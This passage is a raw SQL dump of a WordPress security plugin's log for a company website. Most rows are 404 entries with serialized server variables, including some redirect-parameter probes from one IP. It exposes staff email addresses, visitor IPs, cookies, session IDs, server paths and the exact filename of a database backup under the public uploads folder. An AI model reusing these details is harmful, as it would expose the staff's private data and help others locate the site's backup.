06:34:47',35038312,36841264,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-rooflights%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28110,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"60184\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaawClVwATuNyQjXQnoLwQAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571205130.975\";s:12:\"REQUEST_TIME\";s:10:\"1571205130\";}}','notice','2019-10-16 05:52:12','2019-10-16 05:52:11',35036440,36841472,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28109,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:101:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:99:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"59952\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaawA8zD-tBfd7-tNTIyDAAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571205124.1129\";s:12:\"REQUEST_TIME\";s:10:\"1571205124\";}}','notice','2019-10-16 05:52:06','2019-10-16 05:52:04',35037224,36839864,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28107,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"162.248.4.8\";s:11:\"REMOTE_PORT\";s:5:\"57599\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaaSrtwSqwmg3BSzc7-HuAAAAg8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571197614.7074\";s:12:\"REQUEST_TIME\";s:10:\"1571197614\";}}','notice','2019-10-16 03:46:57','2019-10-16 03:46:55',35427488,37232952,'https://bintara.com.my/?page_id=18',1,0,'162.248.4.8'),(28108,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.231.105.181\";s:11:\"REMOTE_PORT\";s:5:\"45604\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaav8K@51JdM-xtx2nJQ0QAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571205104.2884\";s:12:\"REQUEST_TIME\";s:10:\"1571205104\";}}','notice','2019-10-16 05:51:47','2019-10-16 05:51:44',35426176,37229376,'https://bintara.com.my/?page_id=11',1,0,'165.231.105.181'),(28106,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-n1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaaQbV0LDF77y37oISra-gAAAE4\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-n1/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.85\";s:11:\"REMOTE_PORT\";s:5:\"14148\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaaQbV0LDF77y37oISra-gAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571197037.9038\";s:12:\"REQUEST_TIME\";s:10:\"1571197037\";}}','notice','2019-10-16 03:37:20','2019-10-16 03:37:18',33931360,35732936,'https://bintara.com.my/toughbook-n1/',1,0,'40.77.167.85'),(28104,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-10-16 03:30:07','2019-10-16 03:29:06',37408648,122368320,'wp-cron',1,0,'103.6.198.69'),(28105,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1570592732;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191016-112908-GyO65PbvvpZjYH6KDJ5qLW7uv4Oto5.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20191016-112908-GyO65PbvvpZjYH6KDJ5qLW7uv4Oto5.zip\";s:4:\"size\";i:3793846;}','notice','2019-10-16 03:30:11','2019-10-16 03:29:06',42210248,122368320,'wp-cron',1,0,'103.6.198.69'),(28103,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D7A453AC-8C54-48D8-BBE4-238670B7B136\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZ4al0LDF77y37oISrK@wAAAEQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.190\";s:11:\"REMOTE_PORT\";s:5:\"50995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZ4al0LDF77y37oISrK@wAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571190890.8929\";s:12:\"REQUEST_TIME\";s:10:\"1571190890\";}}','notice','2019-10-16 01:54:54','2019-10-16 01:54:51',35757496,37558336,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.190'),(28102,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{597270F5-7A66-4316-9398-30521ACD5A24}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=5a6f20c63ec886158c93837c0eb09c85\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3E8A463F-88E9-49A0-8260-899E887B2B01\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZ0p10LDF77y37oISrI6QAAAEg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.190\";s:11:\"REMOTE_PORT\";s:5:\"56879\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZ0p10LDF77y37oISrI6QAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571189927.7187\";s:12:\"REQUEST_TIME\";s:10:\"1571189927\";}}','notice','2019-10-16 01:38:50','2019-10-16 01:38:48',35736520,37528720,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'175.142.115.190'),(28101,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"352\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"12-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{5CE094E6-BAAE-4B1B-9FA5-B9ECDF655AB5}\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{25572658-876B-4574-BEC9-F7A8B2E405BE}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:19:\"faiz@bintara.com.my\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"True\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:19:\"faiz@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"12-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZy8szD-tBfd7-tNTIf0AAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.85.190\";s:11:\"REMOTE_PORT\";s:5:\"37432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"